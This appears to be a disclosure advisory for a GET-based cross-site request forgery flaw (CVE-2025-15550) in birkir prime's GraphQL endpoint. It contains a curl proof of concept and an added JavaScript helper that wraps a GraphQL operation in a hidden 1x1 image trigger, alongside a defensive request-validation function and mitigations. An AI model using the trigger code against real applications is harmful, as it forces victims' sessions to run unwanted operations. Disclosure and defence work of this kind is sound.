# birkir prime GraphQL GET-Based CSRF (CVE-2025-15550)

**Author:** Beatriz Fresno Naumova (beafn28), NinjaGPT

**Date:** 29/01/2026

**Vendor:** birkir

**Product:** prime

**Versions affected:** ≤ 0.4.0.beta.0

**Component:** GraphQL endpoint (GET-based query handling)

**CWE:** CWE-352 – Cross-Site Request Forgery (CSRF)

**Attack type:** Remote

**Impact:** Cross-Site Request Forgery (CSRF)

### Description

birkir prime versions up to and including **0.4.0.beta.0** are affected by a **Cross-Site Request Forgery (CSRF)** vulnerability in the GraphQL endpoint.

The application executes GraphQL operations supplied in the query string of **HTTP GET requests**. A browser issues such a request without any user action whenever a page on another origin references the URL (an image, a link, a redirect), and it attaches the victim's session cookie for the prime host. Because the endpoint applies no CSRF protection (a plain GET with no token and no origin check is accepted, as the PoC shows), an attacker can craft a URL carrying a GraphQL operation and have authenticated users execute it unknowingly.

The victim's authenticated session is therefore used to run attacker-chosen operations. The attacker cannot read the response (the same-origin policy blocks cross-origin reads), so the practical impact is bounded by what the resolvers reachable over GET do: a side-effect-free probe such as the PoC below only demonstrates the missing control.
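How the browser-side trigger is built, as an added example that is not part of the advisory or of the prime project. It serialises a GraphQL document the same way the PoC URL does and wraps it in the classic no-interaction trigger, a 1x1 image; the base URL is the PoC's placeholder and the operation and variables are constructed inputs.

```javascript
// Added example, not code from the advisory or the prime project: how a page
// on an attacker-controlled origin turns a GraphQL operation into the GET
// request a victim's browser will issue with its session cookie attached.

// Serialise a GraphQL document the way the PoC URL does. URLSearchParams uses
// application/x-www-form-urlencoded rules: space -> '+', '{' -> %7B, '}' -> %7D.
function buildGetUrl(base, query, variables) {
  const params = new URLSearchParams({ query });
  if (variables !== undefined) {
    params.set('variables', JSON.stringify(variables));
  }
  return `${base}/graphql?${params.toString()}`;
}

// Minimal HTML escaping so the URL survives inside an attribute value.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

// The no-interaction trigger: a 1x1 image. The browser fetches the URL as
// soon as the page renders and attaches cookies for that host unless they are
// marked SameSite=Strict or SameSite=Lax (Lax still sends them on a top-level
// navigation, e.g. a plain <a href> click, so Lax alone does not close the
// link/redirect variant of the same attack).
function buildImgTrigger(base, query, variables) {
  const url = buildGetUrl(base, query, variables);
  return `<img src="${escapeAttr(url)}" width="1" height="1" alt="">`;
}

// Reproduces the PoC URL byte for byte:
// buildGetUrl('http://IP:PORT', 'query cop {__typename}')
//   -> 'http://IP:PORT/graphql?query=query+cop+%7B__typename%7D'
```

The response never reaches the attacker's page, so the trigger is only useful against operations with side effects; with the PoC's `__typename` probe nothing changes on the server, which is why the advisory's impact list depends on which resolvers are reachable over GET.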

### Impact

#### Primary impact

Execution of unauthorized GraphQL queries in the context of an authenticated user.

#### Consequences

* Unauthorized state-changing actions
* Abuse of privileged GraphQL functionality
* Potential data modification or exposure
* Violation of application trust boundaries

### PoC

```
curl -s 'http://IP:PORT/graphql?query=query+cop+%7B__typename%7D'
```

A JSON response whose `data` object contains the `__typename` field confirms that the endpoint executes operations taken from the query string (the original request also sent `-X GET -d ''`, which is redundant: GET is curl's default and a body on a GET is ignored). To demonstrate the CSRF condition rather than bare GET execution, replay the same URL with a logged-in user's session cookie attached (`-b`), or embed it in a page served from a different origin and observe the server-side effect of an operation with side effects.

### CVSS Details

#### CVSS v4.0 Vector

`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

**Base Score:** 5.1 (Medium)

### Solution

No official fix was available at the time of disclosure.

### Recommendation

* Disable execution of GraphQL queries via **HTTP GET**, or at minimum never execute mutations or side-effecting resolvers from a GET request.
* Enforce CSRF protection mechanisms for all GraphQL operations.
* Require POST requests with a non-form `Content-Type` (such as `application/json`) and a valid CSRF token for state-changing operations.
* Validate the `Origin` (or `Referer`) header against the application's own origins and set session cookies with `SameSite=Lax` or `SameSite=Strict`.

### Mitigation

* Restrict GraphQL endpoints to accept **POST requests only**.
* Implement CSRF tokens or double-submit cookie mechanisms.
* Review GraphQL resolvers to ensure proper authorization checks.
* Regularly audit GraphQL endpoints for unintended behaviors.
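A request-policy check that implements the recommendations and mitigations above for a GraphQL endpoint protected by cookie-based sessions, as an added example that is not prime's code. The request shape (`method`, lower-cased `headers`, `body`), the allowed-origin set, the `csrf` cookie and the `X-CSRF-Token` header are assumptions chosen for the demonstration.

```javascript
// Added example, not code from the prime project: decide whether a request
// may reach the GraphQL executor. Every name below is an assumption.
const ALLOWED_ORIGINS = new Set(['https://cms.example.test']); // assumed own origin

// First keyword of a GraphQL document (comments stripped). A bare "{ ... }"
// is a query by definition; anything else unrecognised yields null.
function operationType(doc) {
  const stripped = String(doc).replace(/#[^\n]*/g, '').trim();
  const m = /^(query|mutation|subscription)\b/.exec(stripped);
  if (m) return m[1];
  return stripped.startsWith('{') ? 'query' : null;
}

function parseCookies(header) {
  const out = {};
  for (const part of header.split(';')) {
    const i = part.indexOf('=');
    if (i < 0) continue;
    out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Constant-time string comparison so token checks do not leak via timing.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers: { 'lower-case-name': value }, body: string|object }
function checkGraphqlRequest(req) {
  const h = req.headers || {};

  // 1. Only POST executes operations. A GET with ?query=... is exactly what an
  //    <img>, link or redirect on a hostile page makes the browser send.
  if (String(req.method).toUpperCase() !== 'POST') {
    return { allow: false, reason: 'only POST may execute GraphQL operations' };
  }

  // 2. Require a non-"simple" content type. An HTML form can only send
  //    x-www-form-urlencoded, multipart/form-data or text/plain; anything else
  //    forces a CORS preflight that a foreign origin will fail.
  const ct = (h['content-type'] || '').split(';')[0].trim().toLowerCase();
  if (ct !== 'application/json') {
    return { allow: false, reason: 'content-type must be application/json' };
  }

  // 3. Origin (Referer as fallback) must be one of our own origins.
  let origin = h['origin'] || null;
  if (!origin && h['referer']) {
    try { origin = new URL(h['referer']).origin; } catch { origin = null; }
  }
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { allow: false, reason: 'origin not allowed' };
  }

  // 4. Parse the operation; mutations additionally need a double-submit token
  //    (value in the csrf cookie must equal the X-CSRF-Token header).
  let body;
  try {
    body = typeof req.body === 'string' ? JSON.parse(req.body) : req.body;
  } catch {
    return { allow: false, reason: 'body is not valid JSON' };
  }
  if (!body || typeof body.query !== 'string') {
    return { allow: false, reason: 'missing query' };
  }
  if (operationType(body.query) === 'mutation') {
    const cookies = parseCookies(h['cookie'] || '');
    const token = h['x-csrf-token'];
    if (!token || !cookies.csrf || !constantTimeEqual(token, cookies.csrf)) {
      return { allow: false, reason: 'missing or mismatched CSRF token' };
    }
  }
  return { allow: true, reason: 'ok' };
}
```

Run the advisory's PoC shape through `checkGraphqlRequest` and it is rejected at step 1; a same-origin JSON POST passes, and a mutation passes only when the token in the `csrf` cookie matches the `X-CSRF-Token` header. Steps 1 and 2 together are what stop the browser-initiated request; step 3 catches misconfigured CORS, and step 4 is defence in depth for the case where an attacker can still make a credentialed POST. Setting the session cookie `SameSite=Lax` or `Strict` is an independent layer and belongs in the cookie configuration rather than here.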

### Discoverer

* Beatriz Fresno Naumova (beafn28)
* NinjaGPT

### References

* **CVE Record:** <https://www.cve.org/CVERecord?id=CVE-2025-15550>
* **VulnCheck:** <https://www.vulncheck.com/advisories/birkir-prime-beta-cross-site-request-forgery-in-graphql>
* **Prime:** [https://github.com/birkir/prime/](https://github.com/birkir/prime)

